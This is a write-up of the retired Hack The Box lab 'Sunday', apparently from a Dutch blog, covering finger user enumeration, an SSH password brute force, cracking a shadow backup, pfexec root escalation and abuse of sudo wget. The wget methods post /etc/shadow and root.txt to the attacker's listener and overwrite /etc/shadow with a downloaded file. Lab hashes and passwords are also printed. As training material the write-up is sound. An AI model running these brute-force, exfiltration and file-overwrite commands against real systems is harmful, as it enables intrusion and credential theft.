HTB – Sunday

Today we are going to solve another CTF challenge “Sunday. Sunday is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: find user.txt and root.txt file in the victim’s machine.

Let’s start off with scanning the network to find our target.

c:\Users\jacco>nmap -p- -A 10.10.10.76 --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-14 20:56 W. Europe Standard Time
Nmap scan report for 10.10.10.76
Host is up (0.022s latency).
Not shown: 63170 filtered ports, 2360 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
| finger: Login Name TTY Idle When Where\x0D
|_sunny sunny pts/2 6 Thu 19:03 10.10.14.20 \x0D
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
61851/tcp open smserverd 1 (RPC #100155)
63175/tcp open unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=3/14%OT=79%CT=6%CU=42216%PV=Y%DS=2%DC=T%G=Y%TM=5C8AB26
OS:F%P=i686-pc-windows-windows)SEQ(SP=92%GCD=1%ISR=A3%TI=I%CI=I%II=I%SS=S%T
OS:S=7)SEQ(TI=I%CI=I%II=I%SS=S%TS=7)SEQ(CI=I%II=I)OPS(O1=NNT11M54DNW0NNS%O2
OS:=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O
OS:6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R
OS:=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)

Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 37.00 ms 10.10.14.1
2 38.00 ms 10.10.10.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds

So here, we notice very interesting result from nmap scan, here it shown port 79 is open for Sun Solaris fingered.  So I Googled for its exploit and found Metasploit exploit “Finger Service User Enumerator”.

Then I load Metasploit framework for Identify valid users through the finger service using a variety of tricks and therefore, use the following module.

Exploit

So, basically it reviled so many usernames which it has found, now make a dictionary of the obtain username and password that will be helpful in SSH login brute force.

Here we have used “patator” for SSH login to launch brute force on port 22022 and execute the following command.

root@kali:~/htb/sunny# patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-v2-top15575.txt persistent=0
16:18:12 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-14 16:18 EDT
16:18:12 patator    INFO -                                                                              
16:18:12 patator    INFO - code  size    time | candidate                          |   num | mesg
16:18:12 patator    INFO - -----------------------------------------------------------------------------
16:18:13 patator    INFO - 1     22     0.253 | 123456                             |     1 | Authentication failed.
16:18:13 patator    INFO - 1     22     0.195 | 123456789                          |     3 | Authentication failed.
16:18:13 patator    INFO - 1     22     0.197 | password                           |     2 | Authentication failed.
16:18:14 patator    INFO - 1     22     0.194 | 12345                              |     5 | Authentication failed.
16:18:14 patator    INFO - 1     22     0.190 | qwerty                             |     6 | Authentication failed.
--snip--
16:18:17 patator    INFO - 1     22     0.220 | 654321                             |    14 | Authentication failed.
16:18:17 patator    INFO - 1     22     0.190 | superman                           |    23 | Authentication failed.
16:18:17 patator    INFO - 0     19     0.224 | sunday                             |    22 | SSH-2.0-Sun_SSH_1.3
16:18:17 patator    INFO - 1     22     0.220 | internet                           |    25 | Authentication failed.
16:18:18 patator    INFO - 1     22     0.201 | iloveyou                           |    26 | Authentication failed.
16:18:18 patator    INFO - 1     22     0.195 | michael                            |    24 | Authentication failed.
16:18:18 patator    INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 4 r/s, Time: 0h 0m 6s

Password:  sunday

But when we try to login into ssh by using above credential, it gave “no matching key exchange method found” error and also put some hint and drop the connection request.

Then with little more research, I edit the following key to connect SSH and luckily obtain tty shell access.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022

sudo -l
Then I check sudo -l right for user sunny and notice he can run /root/troll as root without a password.Lol!! Executing /root/troll was a troll.
Further, I check the list for available list and directories, luckily I found shadow.backup inside the /backup directory.

Inside shadow.backup, I found hashes for users Sammy and Sunny.

PS C:\Users\jacco> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
Password: sunday
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
sunny@sunday:~$ ls
Desktop Documents Downloads local.cshrc local.login local.profile Public
sunny@sunday:~$ cd /
sunny@sunday:/$ ls
backup boot dev etc home lib media net platform root sbin tmp var
bin cdrom devices export kernel lost+found mnt opt proc rpool system usr
sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls
agent22.backup shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sunny@sunday:/backup$

So we try to crack these hashes by using john the ripper and fortunately obtained the password in plaintext format “cooldude!” of user sammy.

Privilege Escalation Techniques

The pfexec program is used to execute commands with the attributes specified by the user’s profiles in the exec_attr(4) database. It is invoked by the profile shells, pfsh, pfcsh, and pfksh which are linked to the Bourne shell, C shell, and Korn shell, respectively.

sunny@sunday:/root# find / -perm -u=s -type f 2>/dev/null
/usr/sbin/traceroute
/usr/sbin/pmconfig
/usr/sbin/deallocate
/usr/sbin/i86/whodo
/usr/sbin/allocate
/usr/xpg4/bin/crontab
/usr/xpg4/bin/at
/usr/bin/stclient
/usr/bin/sys-suspend
/usr/bin/rsh
/usr/bin/crontab
/usr/bin/rdist
/usr/bin/sudo
/usr/bin/lpset
/usr/bin/amd64/w
/usr/bin/amd64/uptime
/usr/bin/amd64/newtask
/usr/bin/chkey
/usr/bin/login
/usr/bin/pfexec
/usr/bin/newgrp

Now execute the following command to obtain root privilege shell.

sunny@sunday:/backup$ pfexec bash
sunny@sunday:/backup# id
uid=0(root) gid=0(root) groups=10(staff)
sunny@sunday:/backup# cd /root
sunny@sunday:/root# cat root.txt
fb4*****9b8

Method 2

Now let’s switch from Sunny to Sammy and figure-out assigned sudo permission for him.

sunny@sunday:/backup$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget

As we know that the sudo permission is available for the wget, thus we can use post-file option method to send the contents of any file for example /etc/password or /etc/shadow files.

Therefore we execute the following command to post shadow file content on our local listening machine.

sunny@sunday:~# sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.20
--19:37:03-- http://10.10.14.20/
=> `index.html'
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response...
c:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
10.10.10.76: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.76] 48158: NO_DATA
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.20
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 634

root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

From the given image, you can observe that we have obtained the hash value of the root user. Either you can crack the hash value or can modify it.

So we have copied the above content in a text file and so that we can replace the hash value of user: root from the hash value of user: sunny.

Now download the above-modified shadow file in its original path i.e. /etc/shadow, so that it will overwrite the original shadow file.

sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow

Method 3

Similarly, we can also post the content of the root.txt file directly to the listening machine.

sunny@sunday:~# sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.20
--19:45:30-- http://10.10.14.20/
=> `index.html'
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response...
c:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
10.10.10.76: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.76] 35773: NO_DATA
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.20
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

fb4*****9b8
Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *